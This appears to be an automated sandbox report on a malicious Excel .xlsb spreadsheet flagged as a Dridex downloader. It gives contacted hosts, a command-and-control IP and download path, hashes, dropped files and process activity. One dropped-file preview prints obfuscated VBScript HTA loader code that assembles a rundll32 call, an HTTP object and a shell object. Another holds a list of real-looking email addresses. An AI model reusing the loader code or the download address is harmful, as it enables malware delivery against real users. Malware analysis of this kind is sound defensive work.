                                                                                                                                        https://messaging.office.com/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v24B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/mac4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.ai4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.com4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    132.148.135.183
                                                                                                                                                    unknownUnited States
                                                                                                                                                    398101GO-DADDY-COM-LLCUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                    Analysis ID:528398
                                                                                                                                                    Start date:25.11.2021
                                                                                                                                                    Start time:08:27:04
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 32s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
                                                                                                                                                    Sample file name:474556085436219490680.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:16
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal92.troj.expl.evad.winXLSB@5/9@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Active AutoShape Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.35.236.56, 52.109.76.68, 52.109.12.22, 52.109.12.24
                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, nexus.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    08:28:47API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                    08:28:48API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    132.148.135.183salecode12610151.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    salecode12610151.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment8642156.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment8642156.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    request-377185.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Offer-04563360.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Offer 39052.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    GO-DADDY-COM-LLCUS474556085436219490680.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Akiru.arm7Get hashmaliciousBrowse
                                                                                                                                                    • 192.186.196.248
                                                                                                                                                    KRg7F8O7QdGet hashmaliciousBrowse
                                                                                                                                                    • 209.126.105.220
                                                                                                                                                    Racun je u prilogu.exeGet hashmaliciousBrowse
                                                                                                                                                    • 148.72.144.175
                                                                                                                                                    xDG1WDcI0o.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.201.185.205
                                                                                                                                                    salecode12610151.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    salecode12610151.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    RFQ_PO-330758290144.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 166.62.110.60
                                                                                                                                                    payment8642156.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    payment8642156.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    request-377185.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Offer-04563360.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\ProgramData\UXcqTE.rtf
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4694
                                                                                                                                                    Entropy (8bit):5.080967194560479
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:xJHn1r5l3yol4WgWZDn5undZMPd7U0uSz9DjkCJ3JvV6tXrR3KEZOZ+:xBn1r5l3youW755udZoln3Jw931
                                                                                                                                                    MD5:EA40DFDCBBD4D89CA3FAB7F4F79D988E
                                                                                                                                                    SHA1:0EC52774FA266AD6CDDBA5BF6B4C80FC3384F995
                                                                                                                                                    SHA-256:BAA9B556F6519D15CBF2E30150F293BFAC9AEB5FC7704447E0395ABE785A9748
                                                                                                                                                    SHA-512:E3C62B36F013E73EC30DFA35952A40D3C412C747B6C8E88B2BFA00BAFBFB413B5D597F8D040A534C36B68F2BF8E6E6C519BB2ECCB1BAF3A67FE427B1C84B67F2
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\UXcqTE.rtf, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..N_U_R_p_d_S_h_V_f = "run" & Chr(100+1-1) & "" & Chr(108+1-1) & "l3" & Chr(50+1-1) & ".ex" & "e " & "C:" & "\\P" & "rog" & "ram" & Chr(68+1-1) & "" & Chr(97+1-1) & "ta\" & Chr(116+1-1) & "nig" & Chr(103+1-1) & Chr(101+1-1) & "r.b" & Chr(105+1-1) & "" & "n " & "Dll" & Chr(82+1-1) & "eg" & "ist" & Chr(101+1-1) & Chr(114+1-1) & "" & "Ser" & "ver" & ""..Set L_h_G_Q_C_R_g_R_q_I_E_s = CreateObject("MSX" & Chr(77+1-1) & "L2" & ".S" & "er" & "" & "ver" & Chr(88+1-1) & "ML" & Chr(72+1-1) & "TTP" & "" & ".6" & "" & ".0")....m_w_Y_i_z_k_I_R_N_n_J_x_w = "" & "Wsc" & "" & "" & "rip" & "t.S" & Chr(104+1-1) & "ell"..Set l_o_U_g_F_D_H_S_g_h_J_R_f_d_q_x = CreateObject(m_w_Y_i_z_k_I_R_N_n_J_x_w)..B_y_u_C_D_k_S_O_B_Y_k_R_d = LCase(l_o_U_g_F_D_H_S_g_h_J_R_f_d_q
                                                                                                                                                    C:\ProgramData\VNsYnsilCvEhxr.txt
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):146
                                                                                                                                                    Entropy (8bit):4.488758622005649
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YGEXolKIxmVKadIpSPXX/NkWEn+RNAxK7yiKIu7lRdQ+:YGEXxpgaKpMfNkWzRNAXiTcdn
                                                                                                                                                    MD5:1C511D68DA1D2AC144BD467AEECC7ABD
                                                                                                                                                    SHA1:F1EBFE678514D0BF69C0C442EEF175DF1411196A
                                                                                                                                                    SHA-256:380E5776D7A1F6C1F8E933ACC2D3B97CE1D537CE777A9C6D4912EF8F719AAB81
                                                                                                                                                    SHA-512:7BC6A7A8E1212FB97F7EB067F183DB3FDC754D43E6228EA32704DD3504CD0D2690563C4102A1870EEFD4280FFF7120D38D50CD0103EC3EE2EAFC3B243CEA56C1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: {"carlton@gloves-international.com","darren@darrenterry.com","jeff@mcelwainegroup.com","info@thehighlonesomeranch.com","bkossuth@fccfaithful.org"}
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):140183
                                                                                                                                                    Entropy (8bit):5.357961721714963
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:FcQIfgxrBdA3gBwtnQ9DQW+zCA4Ff7nXbovidXiE6LWmE9:vuQ9DQW+zcXfH
                                                                                                                                                    MD5:B3C8BD03D39F1348AEDA6A94924211D2
                                                                                                                                                    SHA1:485DB8719287A7F49DE8C0EDD055771C774B45FD
                                                                                                                                                    SHA-256:C80EBE3A363D1E6E742140FC22F50623D18846C0028EE4E7A153064E49E83610
                                                                                                                                                    SHA-512:A20BCB9D9FB7574146E118D4F3B1FD3DB86278FE9C15D2D9F1B8D78B126697E5A678C12F4D82F289D16528A9250D939526D9A946D84ACD5FA99932305B779E6B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-25T07:27:55">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\969342E7.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 298 x 42, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2651
                                                                                                                                                    Entropy (8bit):7.878030234685008
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:TLcP5710/A9YAjLgDvN9Dolpe66i9NoG5wCujcaVrc:sPh1mA9zjb3EAwZJc
                                                                                                                                                    MD5:4936B12FE92BC286AE52FB6F462233E6
                                                                                                                                                    SHA1:7AF7A2D93E049A2C95FB63063A03B12445DC760A
                                                                                                                                                    SHA-256:A5A525DADBAD835597B6516D46ADCB131039FCABC7CBF5CD0DE4B688FF9D2668
                                                                                                                                                    SHA-512:E0DDAD23F54660CF5D53689D5B6B3B5D84A18CF1881002A10142011E8D6C5982DEB5A2055E516FFECF9AD143BEF3307DD35B108A4279D8E7430B7CBEEB3EA5B5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR...*...*....../....."IDATx..yTSW...IH.$a..,.E...7,B.m.NK..Z......m...u.................l."...v..D..*.. .%a...C..LB..3.s../................7.`0d@%;.....,?..4..0.....`H....!.,?..4..0.....`H....!.,?..4..0.....`H....!.,?..4..0.....`H....!..+.]..s.Q.....:A~...9(l.k..Z^.....h..PN.&~VzT.....Z....[...;...........th..Es.8..D...WCUJ...Y.U.5.*...2u..Fh....r.gT,...._"l..dU.....S}.V0*...hm)+.<u\...V..R.'....9....>.2.g..C....Gm.7U..>ayV..g...+k...<.9#Fo`.....eB.g$.61.z#A6.c...q._w....X....HP....9.....0....>..2|..h....GF]......Md.FLU..b.A.c..N.8!t..J....*Z........K.:....2m.c..'F.....n.....l.q...%....=M...u...[.1!.....'70$./.5.i.1..]l^...Sg..=o...n.Sm...4...;1.i.D./l.`...?.j../h.L.9...~...{.-...\..Jo...R(.......IMy74=.nOj)-D.. ...(.}u..2p...{e....Y.e..:x..(O76..._Q.TB&.s.0.f......N.....%.?....n.=.'f.!...6......2..=......... .....\....OF}...c -....Ip.F{U.n....F....8.N..@sQ^...Q..[.|K.2..M..H.....N.......>.|^....G...?...hy)....I..2......9.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B6E3948D.tmp
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):71915
                                                                                                                                                    Entropy (8bit):7.881275340778516
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:/Y0/Ad/xcQcRgCoPFwJpvc1e+BwT8YIbDMz+1d6xOegPdd:Q02CQqgCnMrbDu+1d6xOjdd
                                                                                                                                                    MD5:D48BF93B2D184128DA54186E1CD95C8A
                                                                                                                                                    SHA1:01BEF3456CAA2F486CB7EB482AE08EA00CD8F15E
                                                                                                                                                    SHA-256:AC23887C2107DDB14D5D3FDFE88CCE66743FD86BAE60B11C424A0FC907B42690
                                                                                                                                                    SHA-512:3814B14150938715CFA45EC7A48D5D17233EF8EE409476ECDD31F364C14CFC69B99291FCF9B14E7A2F679779C9C83C9268DBF9AEC046573942BFBBD8F22E99EB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DAB16FBC.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 238 x 337, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):38157
                                                                                                                                                    Entropy (8bit):7.96137177194393
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:7PiEGNOfxgpvUM7w1phhsL+ZfBwnTV+YoS2bUoMokqk++yd6OAd/r:7PFwJpvc1e+BwT8YIbDMz+1d6xt
                                                                                                                                                    MD5:B88B9DF024814E6C791FDAC471ABD26C
                                                                                                                                                    SHA1:6FB92BB20F7A51B40E03467C2EBB217A8E21E21A
                                                                                                                                                    SHA-256:02F3AB917A42A10560A274A9CD91FDA01D7BC428C7428CCAF8CCFF1F46DEA39F
                                                                                                                                                    SHA-512:67E6B7FAE7476847835E5A1F17FBFA60DC35B2AAC299A025102540BBA72D8A3CC120FA69E172FBADE6A4B68F464A98005FC38145CC618A6DC45D8C058F704E9E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......Q.....s..6...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):146
                                                                                                                                                    Entropy (8bit):4.488758622005649
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YGEXolKIxmVKadIpSPXX/NkWEn+RNAxK7yiKIu7lRdQ+:YGEXxpgaKpMfNkWzRNAXiTcdn
                                                                                                                                                    MD5:1C511D68DA1D2AC144BD467AEECC7ABD
                                                                                                                                                    SHA1:F1EBFE678514D0BF69C0C442EEF175DF1411196A
                                                                                                                                                    SHA-256:380E5776D7A1F6C1F8E933ACC2D3B97CE1D537CE777A9C6D4912EF8F719AAB81
                                                                                                                                                    SHA-512:7BC6A7A8E1212FB97F7EB067F183DB3FDC754D43E6228EA32704DD3504CD0D2690563C4102A1870EEFD4280FFF7120D38D50CD0103EC3EE2EAFC3B243CEA56C1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: {"carlton@gloves-international.com","darren@darrenterry.com","jeff@mcelwainegroup.com","info@thehighlonesomeranch.com","bkossuth@fccfaithful.org"}
                                                                                                                                                    C:\Users\user\Desktop\~$474556085436219490680.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    \Device\ConDrv
                                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):160
                                                                                                                                                    Entropy (8bit):5.095703110114614
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkeOyHFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egkeOylE
                                                                                                                                                    MD5:A7382C5407567FD1052740600CD07F6E
                                                                                                                                                    SHA1:6367910CCF4FCD18FA40CB909F6DCB1EDCB9030D
                                                                                                                                                    SHA-256:A823AF7A8E4CDFC5ABD47531D8DA5D063ADC0210BFD1982915009586EF73C8A3
                                                                                                                                                    SHA-512:6F84FCFADD30497A0AB67AA39CC87CFD325E1F14A96C3DD2FA46B0B29EB25D2A392F0FD557B463DC4A45DA70F166E34693402991B7AB4833FF5B60AA38E046C7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6892;...ReturnValue = 0;..};....

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.874053667732937
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                    • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                    File name:474556085436219490680.xlsb
                                                                                                                                                    File size:71461
                                                                                                                                                    MD5:75c325deec0cae07e089f47028c4e444
                                                                                                                                                    SHA1:ff3d0672ff1a95212063a42779538c1896d3b77c
                                                                                                                                                    SHA256:f4e3013be0615f60a3a6f6d3d3b26aa5239fe270e404dd465e1b99c2b594b4f8
                                                                                                                                                    SHA512:76a99007b656a14ad9b37aa8f043d1b93f69f16b9e2a71e2015940981cfabbdf4a6432979c898ce9d681a5d528c3efc55397b21e2c3295ba695628fabc84a106
                                                                                                                                                    SSDEEP:1536:UWiPFwJpvc1e+BwT8YIbDMz+1d6xVICUj6GNtV0IXhIjgdbv+T:VFMrbDu+1d6xVxUtT0KIjgdbE
                                                                                                                                                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

